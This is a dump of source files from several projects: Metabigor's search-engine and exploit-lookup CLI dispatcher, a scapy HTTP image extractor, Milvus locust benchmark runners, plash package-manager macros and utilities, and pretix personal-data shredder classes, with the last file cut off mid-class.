metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "0xflotus/Metabigor",
"score": 2
} |
#### File: 0xflotus/Metabigor/metabigor.py
```python
import os, sys
import argparse
from core import config
from core import utils
from modules import fofa
from modules import shodan
from modules import censys
from modules import zoomeye
from modules import sploitus
from modules import vulners
from modules import writeups
from modules import cvedetails
__author__ = '@j3ssiejjj'
__version__ = 'v1.0'
options = {}
def parsing_argument(args):
global options
if args.config:
options['config'] = args.config
if args.query:
options['query'] = args.query
if args.query_list:
options['query_list'] = args.query_list
# query multi source by send json
if args.source_list:
options['source_list'] = args.source_list
# pattern: software | version
if args.target:
options['target'] = args.target
if args.target_list:
options['target_list'] = args.target_list
options = config.config(options, args)
source_parsing(options)
# query by module
def source_parsing(options):
# search on specific search engine which is default routine
if 'custom' in options.get('module'):
if options.get('query_list'):
queris = utils.just_read(options.get('query_list')).splitlines()
for query in queris:
options['query'] = query
single_query(options)
# query by multi source
elif options.get('source_list'):
query_by_source = utils.get_json(utils.just_read(options.get('source_list')))
if type(query_by_source) == dict:
for key, value in query_by_source.items():
options['source'] = key
options['query'] = value
single_query(options)
else:
utils.print_bad("Look like your Source file not correct the pattern")
else:
single_query(options)
# search for exploit
if 'exploit' in options.get('module'):
if options.get('target_list'):
targets = utils.just_read(options.get('target_list')).splitlines()
for query in targets:
options['target'] = query
module_query(options)
else:
module_query(options)
def module_query(options):
utils.print_debug(options, options)
utils.print_info("Query: {0}".format(options.get('target')))
if 'exploit' in options.get('module'):
if '|' in options.get('target'):
options['product'] = options.get('target').split('|')[0].strip()
if options['relatively']:
utils.print_info("Running with relative version")
exact_version = options.get('target').split('|')[1].strip()
if '.' in exact_version:
options['version'] = exact_version.split('.')[0] + "."
else:
options['version'] = options.get(
'target').split('|')[1].strip()
else:
options['product'] = options.get('target')
sploitus.Sploitus(options)
vulners.Vulners(options)
writeups.Writeups(options)
cvedetails.Cvedetails(options)
# really do a query
def single_query(options):
utils.print_debug(options, options)
utils.print_info("Query: {0}".format(options.get('query')))
if not options.get('source'):
utils.print_bad("You need to specify Search engine")
return
if 'fofa' in options.get('source'):
fofa.Fofa(options)
if 'shodan' in options.get('source'):
shodan.Shodan(options)
if 'censys' in options.get('source'):
censys.Censys(options)
if 'zoom' in options.get('source'):
zoomeye.ZoomEye(options)
def main():
config.banner(__author__, __version__)
parser = argparse.ArgumentParser(
description="Command line Search Engines without any API key")
parser.add_argument('-c', '--config', action='store', dest='config',
help='config file', default='config.conf')
parser.add_argument('--cookies', action='store',
dest='cookies', help='content of cookies cookie')
parser.add_argument('-m', '--module', action='store',
dest='module', help='Specific predefine module', default='custom')
parser.add_argument('-t', '--target', action='store',
dest='target', help="Target for module (pattern: -t 'software|version')")
parser.add_argument('-T', '--target_list', action='store',
dest='target_list', help='Target for module')
parser.add_argument('-s', '--source', action='store',
dest='source', help='name of search engine (e.g: shodan, censys, fofa)')
parser.add_argument('-S', '--source_list', action='store',
dest='source_list', help='JSON config for multiple search engine (e.g: shodan, censys, fofa)')
parser.add_argument('-q', '--query', action='store',
dest='query', help='Query from search engine')
parser.add_argument('-Q', '--query_list', action='store',
dest='query_list', help='List of query from search engine')
parser.add_argument('-d', '--outdir', action='store',
dest='outdir', help='Directory output', default='.')
parser.add_argument('-o', '--output', action='store',
dest='output', help='Output file name', default='output')
parser.add_argument('--raw', action='store',
dest='raw', help='Directory to store raw query', default='raw')
parser.add_argument('--proxy', action='store',
dest='proxy', help='Proxy for doing request to search engine e.g: http://127.0.0.1:8080 ')
parser.add_argument('-b', action='store_true', dest='brute', help='Auto brute force the country code')
parser.add_argument('--disable_pages', action='store_true', dest='disable_pages', help="Don't loop though the pages")
parser.add_argument('--store_content', action='store_true',
dest='store_content', help="Store the raw HTML souce or not")
parser.add_argument('-hh', action='store_true', dest='helps', help='Print more help')
parser.add_argument('-M', action='store_true',
dest='modules_help', help='Print available modules')
parser.add_argument('--rel', action='store_true',
dest='relatively', help='Get exact app and version')
parser.add_argument('--debug', action='store_true', dest='debug', help='Print debug output')
parser.add_argument('--update', action='store_true',
dest='update', help='Update lastest version from git')
args = parser.parse_args()
if len(sys.argv) == 1 or args.helps:
config.custom_help()
if args.modules_help:
config.modules_help()
if args.update:
config.update()
parsing_argument(args)
if __name__ == '__main__':
main()
``` |
{
"source": "0xflotus/milvus",
"score": 2
} |
#### File: milvus_benchmark/runners/locust.py
```python
import pdb
import time
import copy
import logging
from . import locust_user
from .base import BaseRunner
from milvus_benchmark import parser
from milvus_benchmark import utils
from milvus_benchmark.runners import utils as runner_utils
logger = logging.getLogger("milvus_benchmark.runners.locust")
class LocustRunner(BaseRunner):
def __init__(self, env, metric):
super(LocustRunner, self).__init__(env, metric)
def run_case(self, case_metric, **case_param):
collection_name = case_param["collection_name"]
task = case_param["task"]
connection_type = case_param["connection_type"]
# spawn locust requests
task["during_time"] = utils.timestr_to_int(task["during_time"])
task_types = task["types"]
run_params = {"tasks": {}}
run_params.update(task)
info_in_params = {
"index_field_name": case_param["index_field_name"],
"vector_field_name": case_param["vector_field_name"],
"dimension": case_param["dimension"],
"collection_info": self.milvus.get_info(collection_name)}
logger.info(info_in_params)
run_params.update({"op_info": info_in_params})
for task_type in task_types:
run_params["tasks"].update({
task_type["type"]: {
"weight": task_type["weight"] if "weight" in task_type else 1,
"params": task_type["params"] if "params" in task_type else None,
}
})
# collect stats
# pdb.set_trace()
logger.info(run_params)
locust_stats = locust_user.locust_executor(self.hostname, self.port, collection_name,
connection_type=connection_type, run_params=run_params)
return locust_stats
class LocustInsertRunner(LocustRunner):
"""run insert"""
name = "locust_insert_performance"
def __init__(self, env, metric):
super(LocustInsertRunner, self).__init__(env, metric)
def extract_cases(self, collection):
collection_name = collection["collection_name"] if "collection_name" in collection else None
(data_type, collection_size, dimension, metric_type) = parser.collection_parser(collection_name)
ni_per = collection["ni_per"]
build_index = collection["build_index"] if "build_index" in collection else False
vector_type = runner_utils.get_vector_type(data_type)
other_fields = collection["other_fields"] if "other_fields" in collection else None
collection_info = {
"dimension": dimension,
"metric_type": metric_type,
"dataset_name": collection_name,
"collection_size": collection_size,
"other_fields": other_fields,
"ni_per": ni_per
}
index_field_name = None
index_type = None
index_param = None
index_info = None
vector_field_name = runner_utils.get_default_field_name(vector_type)
if build_index is True:
index_type = collection["index_type"]
index_param = collection["index_param"]
index_info = {
"index_type": index_type,
"index_param": index_param
}
index_field_name = runner_utils.get_default_field_name(vector_type)
task = collection["task"]
connection_type = "single"
connection_num = task["connection_num"]
if connection_num > 1:
connection_type = "multi"
run_params = {
"task": collection["task"],
"connection_type": connection_type,
}
self.init_metric(self.name, collection_info, index_info, None, run_params)
case_metric = copy.deepcopy(self.metric)
case_metric.set_case_metric_type()
case_metrics = list()
case_params = list()
case_metrics.append(case_metric)
case_param = {
"collection_name": collection_name,
"data_type": data_type,
"dimension": dimension,
"collection_size": collection_size,
"ni_per": ni_per,
"metric_type": metric_type,
"vector_type": vector_type,
"other_fields": other_fields,
"build_index": build_index,
"index_field_name": index_field_name,
"vector_field_name": vector_field_name,
"index_type": index_type,
"index_param": index_param,
"task": collection["task"],
"connection_type": connection_type,
}
case_params.append(case_param)
return case_params, case_metrics
def prepare(self, **case_param):
collection_name = case_param["collection_name"]
dimension = case_param["dimension"]
vector_type = case_param["vector_type"]
other_fields = case_param["other_fields"]
index_field_name = case_param["index_field_name"]
build_index = case_param["build_index"]
self.milvus.set_collection(collection_name)
if self.milvus.exists_collection():
logger.debug("Start drop collection")
self.milvus.drop()
time.sleep(runner_utils.DELETE_INTERVAL_TIME)
self.milvus.create_collection(dimension, data_type=vector_type,
other_fields=other_fields)
# TODO: update fields in collection_info
# fields = self.get_fields(self.milvus, collection_name)
# collection_info = {
# "dimension": dimension,
# "metric_type": metric_type,
# "dataset_name": collection_name,
# "fields": fields
# }
if build_index is True:
if case_param["index_type"]:
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
logger.debug(self.milvus.describe_index(index_field_name))
else:
build_index = False
logger.warning("Please specify the index_type")
class LocustSearchRunner(LocustRunner):
"""run search"""
name = "locust_search_performance"
def __init__(self, env, metric):
super(LocustSearchRunner, self).__init__(env, metric)
def extract_cases(self, collection):
collection_name = collection["collection_name"] if "collection_name" in collection else None
(data_type, collection_size, dimension, metric_type) = parser.collection_parser(collection_name)
ni_per = collection["ni_per"]
build_index = collection["build_index"] if "build_index" in collection else False
vector_type = runner_utils.get_vector_type(data_type)
other_fields = collection["other_fields"] if "other_fields" in collection else None
collection_info = {
"dimension": dimension,
"metric_type": metric_type,
"dataset_name": collection_name,
"collection_size": collection_size,
"other_fields": other_fields,
"ni_per": ni_per
}
index_field_name = None
index_type = None
index_param = None
index_info = None
if build_index is True:
index_type = collection["index_type"]
index_param = collection["index_param"]
index_info = {
"index_type": index_type,
"index_param": index_param
}
index_field_name = runner_utils.get_default_field_name(vector_type)
vector_field_name = runner_utils.get_default_field_name(vector_type)
task = collection["task"]
connection_type = "single"
connection_num = task["connection_num"]
if connection_num > 1:
connection_type = "multi"
run_params = {
"task": collection["task"],
"connection_type": connection_type,
}
self.init_metric(self.name, collection_info, index_info, None, run_params)
case_metric = copy.deepcopy(self.metric)
# set metric type as case
case_metric.set_case_metric_type()
case_metrics = list()
case_params = list()
case_metrics.append(case_metric)
case_param = {
"collection_name": collection_name,
"data_type": data_type,
"dimension": dimension,
"collection_size": collection_size,
"ni_per": ni_per,
"metric_type": metric_type,
"vector_type": vector_type,
"other_fields": other_fields,
"build_index": build_index,
"index_field_name": index_field_name,
"vector_field_name": vector_field_name,
"index_type": index_type,
"index_param": index_param,
"task": collection["task"],
"connection_type": connection_type,
}
case_params.append(case_param)
return case_params, case_metrics
def prepare(self, **case_param):
collection_name = case_param["collection_name"]
dimension = case_param["dimension"]
vector_type = case_param["vector_type"]
other_fields = case_param["other_fields"]
index_field_name = case_param["index_field_name"]
metric_type = case_param["metric_type"]
build_index = case_param["build_index"]
self.milvus.set_collection(collection_name)
if self.milvus.exists_collection():
logger.debug("Start drop collection")
self.milvus.drop()
time.sleep(runner_utils.DELETE_INTERVAL_TIME)
self.milvus.create_collection(dimension, data_type=vector_type,
other_fields=other_fields)
# TODO: update fields in collection_info
# fields = self.get_fields(self.milvus, collection_name)
# collection_info = {
# "dimension": dimension,
# "metric_type": metric_type,
# "dataset_name": collection_name,
# "fields": fields
# }
if build_index is True:
if case_param["index_type"]:
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
logger.debug(self.milvus.describe_index(index_field_name))
else:
build_index = False
logger.warning("Please specify the index_type")
self.insert(self.milvus, collection_name, case_param["data_type"], dimension, case_param["collection_size"], case_param["ni_per"])
build_time = 0.0
start_time = time.time()
self.milvus.flush()
flush_time = round(time.time()-start_time, 2)
logger.debug(self.milvus.count())
if build_index is True:
logger.debug("Start build index for last file")
start_time = time.time()
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
build_time = round(time.time()-start_time, 2)
logger.debug({"flush_time": flush_time, "build_time": build_time})
logger.info(self.milvus.count())
logger.info("Start load collection")
load_start_time = time.time()
self.milvus.load_collection()
logger.debug({"load_time": round(time.time()-load_start_time, 2)})
# search_param = None
# for op in case_param["task"]["types"]:
# if op["type"] == "query":
# search_param = op["params"]["search_param"]
# break
# logger.info("index_field_name: {}".format(index_field_name))
# TODO: enable warm query
# self.milvus.warm_query(index_field_name, search_param, metric_type, times=2)
class LocustRandomRunner(LocustRunner):
"""run random interface"""
name = "locust_random_performance"
def __init__(self, env, metric):
super(LocustRandomRunner, self).__init__(env, metric)
def extract_cases(self, collection):
collection_name = collection["collection_name"] if "collection_name" in collection else None
(data_type, collection_size, dimension, metric_type) = parser.collection_parser(collection_name)
ni_per = collection["ni_per"]
build_index = collection["build_index"] if "build_index" in collection else False
vector_type = runner_utils.get_vector_type(data_type)
other_fields = collection["other_fields"] if "other_fields" in collection else None
collection_info = {
"dimension": dimension,
"metric_type": metric_type,
"dataset_name": collection_name,
"collection_size": collection_size,
"other_fields": other_fields,
"ni_per": ni_per
}
index_field_name = None
index_type = None
index_param = None
index_info = None
vector_field_name = runner_utils.get_default_field_name(vector_type)
if build_index is True:
index_type = collection["index_type"]
index_param = collection["index_param"]
index_info = {
"index_type": index_type,
"index_param": index_param
}
index_field_name = runner_utils.get_default_field_name(vector_type)
task = collection["task"]
connection_type = "single"
connection_num = task["connection_num"]
if connection_num > 1:
connection_type = "multi"
run_params = {
"task": collection["task"],
"connection_type": connection_type,
}
self.init_metric(self.name, collection_info, index_info, None, run_params)
case_metric = copy.deepcopy(self.metric)
case_metric.set_case_metric_type()
case_metrics = list()
case_params = list()
case_metrics.append(case_metric)
case_param = {
"collection_name": collection_name,
"data_type": data_type,
"dimension": dimension,
"collection_size": collection_size,
"ni_per": ni_per,
"metric_type": metric_type,
"vector_type": vector_type,
"other_fields": other_fields,
"build_index": build_index,
"index_field_name": index_field_name,
"vector_field_name": vector_field_name,
"index_type": index_type,
"index_param": index_param,
"task": collection["task"],
"connection_type": connection_type,
}
case_params.append(case_param)
return case_params, case_metrics
def prepare(self, **case_param):
collection_name = case_param["collection_name"]
dimension = case_param["dimension"]
vector_type = case_param["vector_type"]
other_fields = case_param["other_fields"]
index_field_name = case_param["index_field_name"]
build_index = case_param["build_index"]
self.milvus.set_collection(collection_name)
if self.milvus.exists_collection():
logger.debug("Start drop collection")
self.milvus.drop()
time.sleep(runner_utils.DELETE_INTERVAL_TIME)
self.milvus.create_collection(dimension, data_type=vector_type,
other_fields=other_fields)
# TODO: update fields in collection_info
# fields = self.get_fields(self.milvus, collection_name)
# collection_info = {
# "dimension": dimension,
# "metric_type": metric_type,
# "dataset_name": collection_name,
# "fields": fields
# }
if build_index is True:
if case_param["index_type"]:
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
logger.debug(self.milvus.describe_index(index_field_name))
else:
build_index = False
logger.warning("Please specify the index_type")
self.insert(self.milvus, collection_name, case_param["data_type"], dimension, case_param["collection_size"], case_param["ni_per"])
build_time = 0.0
start_time = time.time()
self.milvus.flush()
flush_time = round(time.time()-start_time, 2)
logger.debug(self.milvus.count())
if build_index is True:
logger.debug("Start build index for last file")
start_time = time.time()
self.milvus.create_index(index_field_name, case_param["index_type"], case_param["metric_type"], index_param=case_param["index_param"])
build_time = round(time.time()-start_time, 2)
logger.debug({"flush_time": flush_time, "build_time": build_time})
logger.info(self.milvus.count())
logger.info("Start load collection")
load_start_time = time.time()
self.milvus.load_collection()
logger.debug({"load_time": round(time.time()-load_start_time, 2)})
``` |
{
"source": "0xflotus/netimages",
"score": 3
} |
#### File: netimages/netimages/extractor.py
```python
from scapy.all import load_layer
from scapy.layers.http import HTTP, HTTPResponse
load_layer("http")
def extract_http_images(packets):
for packet in packets:
if packet.haslayer(HTTPResponse):
p = packet[HTTP]
if p.Content_Type and b"image" in p.Content_Type:
yield packet.load, p.Location
``` |
{
"source": "0xflotus/plash",
"score": 2
} |
#### File: plash/macros/packagemanagers.py
```python
from plash.eval import eval, register_macro, shell_escape_args
@register_macro()
def defpm(name, *lines):
'define a new package manager'
@register_macro(name, group='package managers')
@shell_escape_args
def package_manager(*packages):
if not packages:
return
sh_packages = ' '.join(pkg for pkg in packages)
expanded_lines = [line.format(sh_packages) for line in lines]
return eval([['run'] + expanded_lines])
package_manager.__doc__ = "install packages with {}".format(name)
eval([[
'defpm',
'apt',
'apt-get update',
'apt-get install -y {}',
], [
'defpm',
'add-apt-repository',
'apt-get install software-properties-common',
'run add-apt-repository -y {}',
], [
'defpm',
'apk',
'apk update',
'apk add {}',
], [
'defpm',
'yum',
'yum install -y {}',
], [
'defpm',
'dnf',
'dnf install -y {}',
], [
'defpm',
'pip',
'pip install {}',
], [
'defpm',
'pip3',
'pip3 install {}',
], [
'defpm',
'npm',
'npm install -g {}',
], [
'defpm',
'pacman',
'pacman -Sy --noconfirm {}',
], [
'defpm',
'emerge',
'emerge {}',
]])
```
#### File: plash/plash/utils.py
```python
import os
import sys
from contextlib import contextmanager
from os.path import join
ERROR_COLOR = 1
INFO_COLOR = 4
def hashstr(stri):
import hashlib
return hashlib.sha1(stri).hexdigest()
@contextmanager
def catch_and_die(exceptions,
debug=None,
debug_class=False,
ignore=None,
silent=False,
exit=1):
try:
yield
except tuple(exceptions) as exc:
if ignore and isinstance(exc, ignore):
raise
if silent:
sys.exit(exit)
msg = str(exc)
if msg.startswith('<') and msg.endswith('>'):
msg = msg[1:-1]
if debug_class:
debug = exc.__class__.__name__
if debug:
msg = '{debug}: {message}'.format(debug=debug, message=msg)
die(msg, exit=exit)
def get_plash_data():
if os.getuid():
default = '~/.plashdata'
else:
default = '/var/lib/plash'
dir = os.environ.get('PLASH_DATA', default)
return os.path.expanduser(dir)
def color(stri, color, isatty_fd_check=2):
if os.environ.get('TERM') != 'dumb' and os.isatty(isatty_fd_check):
return "\033[38;05;{}m".format(int(color)) + stri + "\033[0;0m"
return stri
def die(msg, exit=1):
prog = os.path.basename(sys.argv[0])
print(
'{} {}'.format(color('plash error:', ERROR_COLOR), msg),
file=sys.stderr)
sys.exit(exit)
def info(msg):
print(color(msg, INFO_COLOR), file=sys.stderr)
def die_with_usage(*, hint=False):
prog = os.path.basename(sys.argv[0])
printed_usage = False
with open(sys.argv[0]) as f:
for line in f.readlines():
if line.startswith('# usage:'):
usage_line = line[2:]
print('{}: {}'.format(prog, usage_line), end='')
printed_usage = True
assert printed_usage, 'could not find usage comment'
if hint:
print('{}: usage hint: {}'.format(prog, hint), file=sys.stderr)
sys.exit(2)
def handle_help_flag():
if len(sys.argv) >= 2 and sys.argv[1] in ('--help', '-h'):
with open(sys.argv[0]) as f:
do_print = False
for line in f.readlines():
if line.startswith('# usage:'):
do_print = True
elif line and not line.startswith('#'):
break
if do_print:
print(line[2:].rstrip('\n'))
sys.exit(0)
def filter_positionals(args):
positional = []
filtered_args = []
found_first_opt = False
while args:
arg = args.pop(0)
if not arg.startswith('-') and not found_first_opt:
positional.append(arg)
elif arg == '--':
positional += args
args = None
else:
filtered_args.append(arg)
found_first_opt = True
return positional, filtered_args
def handle_build_args():
import subprocess
if len(sys.argv) >= 2 and sys.argv[1].startswith('-'):
cmd, args = filter_positionals(sys.argv[1:])
with catch_and_die([subprocess.CalledProcessError], silent=True):
out = subprocess.check_output(['plash-build'] + args)
container_id = out[:-1]
os.execlp(sys.argv[0], sys.argv[0], container_id, *cmd)
def nodepath_or_die(container, allow_root_container=False):
import subprocess
extra = [] if not allow_root_container else ['--allow-root-container']
with catch_and_die([subprocess.CalledProcessError], silent=True):
return subprocess.check_output(
['plash-nodepath', str(container)] + extra, ).decode().strip('\n')
def get_default_shell(passwd_file):
with open(passwd_file) as f:
# the first entry is the root entry
# https://security.stackexchange.com/questions/96241/why-require-root-to-be-the-first-entry-in-etc-passwd
root_entry = f.readline().rstrip('\n')
default_root_shell = root_entry.split(":")[6]
return default_root_shell
def get_default_user_shell():
import pwd
return pwd.getpwuid(os.getuid()).pw_shell
def plash_map(*args):
from subprocess import check_output
'thin wrapper around plash map'
out = check_output(['plash-map'] + list(args))
if out == '':
return None
return out.decode().strip('\n')
def assert_initialized():
last_inited = join(get_plash_data(), 'index', '0')
if not os.path.exists(last_inited):
die('first run `plash init`')
def run_write_read(cmd, input):
import subprocess
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(input)
p.stdin.close()
exit = p.wait()
if exit:
raise subprocess.CalledProcessError(exit, cmd)
return p.stdout.read()
def mkdtemp():
import tempfile
return tempfile.mkdtemp(
dir=os.path.join(get_plash_data(), 'tmp'),
prefix='plashtmp_{}_{}_'.format(os.getsid(0), os.getpid()))
``` |
{
"source": "0xflotus/pretix",
"score": 2
} |
#### File: pretix/base/shredder.py
```python
import json
from datetime import timedelta
from typing import List, Tuple
from django.db import transaction
from django.db.models import Max, Q
from django.db.models.functions import Greatest
from django.dispatch import receiver
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _
from pretix.api.serializers.order import (
AnswerSerializer, InvoiceAddressSerializer,
)
from pretix.api.serializers.waitinglist import WaitingListSerializer
from pretix.base.i18n import LazyLocaleException
from pretix.base.models import (
CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, OrderPayment,
OrderPosition, OrderRefund, QuestionAnswer,
)
from pretix.base.services.invoices import invoice_pdf_task
from pretix.base.signals import register_data_shredders
from pretix.helpers.json import CustomJSONEncoder
class ShredError(LazyLocaleException):
pass
def shred_constraints(event: Event):
if event.has_subevents:
max_date = event.subevents.aggregate(
max_from=Max('date_from'),
max_to=Max('date_to'),
max_fromto=Greatest(Max('date_to'), Max('date_from'))
)
max_date = max_date['max_fromto'] or max_date['max_to'] or max_date['max_from']
if max_date is not None and max_date > now() - timedelta(days=30):
return _('Your event needs to be over for at least 30 days to use this feature.')
else:
if (event.date_to or event.date_from) > now() - timedelta(days=30):
return _('Your event needs to be over for at least 30 days to use this feature.')
if event.live:
return _('Your ticket shop needs to be offline to use this feature.')
return None
class BaseDataShredder:
"""
This is the base class for all data shredders.
"""
def __init__(self, event: Event):
self.event = event
def __str__(self):
return self.identifier
def generate_files(self) -> List[Tuple[str, str, str]]:
"""
This method is called to export the data that is about to be shred and return a list of tuples consisting of a
filename, a file type and file content.
You can also implement this as a generator and ``yield`` those tuples instead of returning a list of them.
"""
raise NotImplementedError() # NOQA
def shred_data(self):
"""
This method is called to actually remove the data from the system. You should remove any database objects
here.
You should never delete ``LogEntry`` objects, but you might modify them to remove personal data. In this
case, set the ``LogEntry.shredded`` attribute to ``True`` to show that this is no longer original log data.
"""
raise NotImplementedError() # NOQA
@property
def tax_relevant(self):
"""
Indicates whether this removes potentially tax-relevant data.
"""
return False
@property
def verbose_name(self) -> str:
"""
A human-readable name for what this shredder removes. This should be short but self-explanatory.
Good examples include 'E-Mail addresses' or 'Invoices'.
"""
raise NotImplementedError() # NOQA
@property
def identifier(self) -> str:
"""
A short and unique identifier for this shredder.
This should only contain lowercase letters and in most
cases will be the same as your package name.
"""
raise NotImplementedError() # NOQA
@property
def description(self) -> str:
"""
A more detailed description of what this shredder does. Can contain HTML.
"""
raise NotImplementedError() # NOQA
def shred_log_fields(logentry, banlist=None, whitelist=None):
d = logentry.parsed_data
if whitelist:
for k, v in d.items():
if k not in whitelist:
d[k] = '█'
elif banlist:
for f in banlist:
if f in d:
d[f] = '█'
logentry.data = json.dumps(d)
logentry.shredded = True
logentry.save(update_fields=['data', 'shredded'])
class PhoneNumberShredder(BaseDataShredder):
verbose_name = _('Phone numbers')
identifier = 'phone_numbers'
description = _('This will remove all phone numbers from orders.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'phone-by-order.json', 'application/json', json.dumps({
o.code: o.phone for o in self.event.orders.filter(phone__isnull=False)
}, cls=CustomJSONEncoder, indent=4)
@transaction.atomic
def shred_data(self):
for o in self.event.orders.all():
o.phone = None
d = o.meta_info_data
if d:
if 'contact_form_data' in d and 'phone' in d['contact_form_data']:
del d['contact_form_data']['phone']
o.meta_info = json.dumps(d)
o.save(update_fields=['meta_info', 'phone'])
for le in self.event.logentry_set.filter(action_type="pretix.event.order.phone.changed"):
shred_log_fields(le, banlist=['old_phone', 'new_phone'])
class EmailAddressShredder(BaseDataShredder):
verbose_name = _('E-mails')
identifier = 'order_emails'
description = _('This will remove all e-mail addresses from orders and attendees, as well as logged email '
'contents.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'emails-by-order.json', 'application/json', json.dumps({
o.code: o.email for o in self.event.orders.filter(email__isnull=False)
}, indent=4)
yield 'emails-by-attendee.json', 'application/json', json.dumps({
'{}-{}'.format(op.order.code, op.positionid): op.attendee_email
for op in OrderPosition.all.filter(order__event=self.event, attendee_email__isnull=False)
}, indent=4)
@transaction.atomic
def shred_data(self):
OrderPosition.all.filter(order__event=self.event, attendee_email__isnull=False).update(attendee_email=None)
for o in self.event.orders.all():
o.email = None
d = o.meta_info_data
if d:
if 'contact_form_data' in d and 'email' in d['contact_form_data']:
del d['contact_form_data']['email']
o.meta_info = json.dumps(d)
o.save(update_fields=['meta_info', 'email'])
for le in self.event.logentry_set.filter(action_type__contains="order.email"):
shred_log_fields(le, banlist=['recipient', 'message', 'subject'])
for le in self.event.logentry_set.filter(action_type="pretix.event.order.contact.changed"):
shred_log_fields(le, banlist=['old_email', 'new_email'])
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
if 'data' in d:
for row in d['data']:
if 'attendee_email' in row:
row['attendee_email'] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class WaitingListShredder(BaseDataShredder):
verbose_name = _('Waiting list')
identifier = 'waiting_list'
description = _('This will remove all email addresses from the waiting list.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'waiting-list.json', 'application/json', json.dumps([
WaitingListSerializer(wle).data
for wle in self.event.waitinglistentries.all()
], indent=4)
@transaction.atomic
def shred_data(self):
self.event.waitinglistentries.update(email='█')
for wle in self.event.waitinglistentries.select_related('voucher').filter(voucher__isnull=False):
if '@' in wle.voucher.comment:
wle.voucher.comment = '█'
wle.voucher.save(update_fields=['comment'])
for le in self.event.logentry_set.filter(action_type="pretix.voucher.added.waitinglist").exclude(data=""):
d = le.parsed_data
d['email'] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class AttendeeInfoShredder(BaseDataShredder):
verbose_name = _('Attendee info')
identifier = 'attendee_info'
description = _('This will remove all attendee names and postal addresses from order positions, as well as logged '
'changes to them.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'attendee-info.json', 'application/json', json.dumps({
'{}-{}'.format(op.order.code, op.positionid): {
'name': op.attendee_name,
'company': op.company,
'street': op.street,
'zipcode': op.zipcode,
'city': op.city,
'country': str(op.country) if op.country else None,
'state': op.state
} for op in OrderPosition.all.filter(
order__event=self.event
).filter(
Q(Q(attendee_name_cached__isnull=False) | Q(attendee_name_parts__isnull=False))
)
}, indent=4)
@transaction.atomic
def shred_data(self):
OrderPosition.all.filter(
order__event=self.event
).filter(
Q(attendee_name_cached__isnull=False) | Q(attendee_name_parts__isnull=False) |
Q(company__isnull=False) | Q(street__isnull=False) | Q(zipcode__isnull=False) | Q(city__isnull=False)
).update(attendee_name_cached=None, attendee_name_parts={'_shredded': True}, company=None, street=None,
zipcode=None, city=None)
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
if 'data' in d:
for i, row in enumerate(d['data']):
if 'attendee_name' in row:
d['data'][i]['attendee_name'] = '█'
if 'attendee_name_parts' in row:
d['data'][i]['attendee_name_parts'] = {
'_legacy': '█'
}
if 'company' in row:
d['data'][i]['company'] = '█'
if 'street' in row:
d['data'][i]['street'] = '█'
if 'zipcode' in row:
d['data'][i]['zipcode'] = '█'
if 'city' in row:
d['data'][i]['city'] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class InvoiceAddressShredder(BaseDataShredder):
verbose_name = _('Invoice addresses')
identifier = 'invoice_addresses'
tax_relevant = True
description = _('This will remove all invoice addresses from orders, as well as logged changes to them.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'invoice-addresses.json', 'application/json', json.dumps({
ia.order.code: InvoiceAddressSerializer(ia).data
for ia in InvoiceAddress.objects.filter(order__event=self.event)
}, indent=4)
@transaction.atomic
def shred_data(self):
InvoiceAddress.objects.filter(order__event=self.event).delete()
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
if 'invoice_data' in d and not isinstance(d['invoice_data'], bool):
for field in d['invoice_data']:
if d['invoice_data'][field]:
d['invoice_data'][field] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class QuestionAnswerShredder(BaseDataShredder):
verbose_name = _('Question answers')
identifier = 'question_answers'
description = _('This will remove all answers to questions, as well as logged changes to them.')
def generate_files(self) -> List[Tuple[str, str, str]]:
yield 'question-answers.json', 'application/json', json.dumps({
'{}-{}'.format(op.order.code, op.positionid): AnswerSerializer(op.answers.all(), many=True).data
for op in OrderPosition.all.filter(order__event=self.event).prefetch_related('answers')
}, indent=4)
@transaction.atomic
def shred_data(self):
QuestionAnswer.objects.filter(orderposition__order__event=self.event).delete()
for le in self.event.logentry_set.filter(action_type="pretix.event.order.modified").exclude(data=""):
d = le.parsed_data
if 'data' in d:
for i, row in enumerate(d['data']):
for f in row:
if f not in ('attendee_name', 'attendee_email'):
d['data'][i][f] = '█'
le.data = json.dumps(d)
le.shredded = True
le.save(update_fields=['data', 'shredded'])
class InvoiceShredder(BaseDataShredder):
verbose_name = _('Invoices')
identifier = 'invoices'
tax_relevant = True
description = _('This will remove all invoice PDFs, as well as any of their text content that might contain '
'personal data from the database. Invoice numbers and totals will be conserved.')
def generate_files(self) -> List[Tuple[str, str, str]]:
for i in self.event.invoices.filter(shredded=False):
if not i.file:
invoice_pdf_task.apply(args=(i.pk,))
i.refresh_from_db()
i.file.open('rb')
yield 'invoices/{}.pdf'.format(i.number), 'application/pdf', i.file.read()
i.file.close()
@transaction.atomic
def shred_data(self):
for i in self.event.invoices.filter(shredded=False):
if i.file:
i.file.delete()
i.shredded = True
i.introductory_text = "█"
i.additional_text = "█"
i.invoice_to = "█"
i.payment_provider_text = "█"
i.save()
i.lines.update(description="█")
class CachedTicketShredder(BaseDataShredder):
verbose_name = _('Cached ticket files')
identifier = 'cachedtickets'
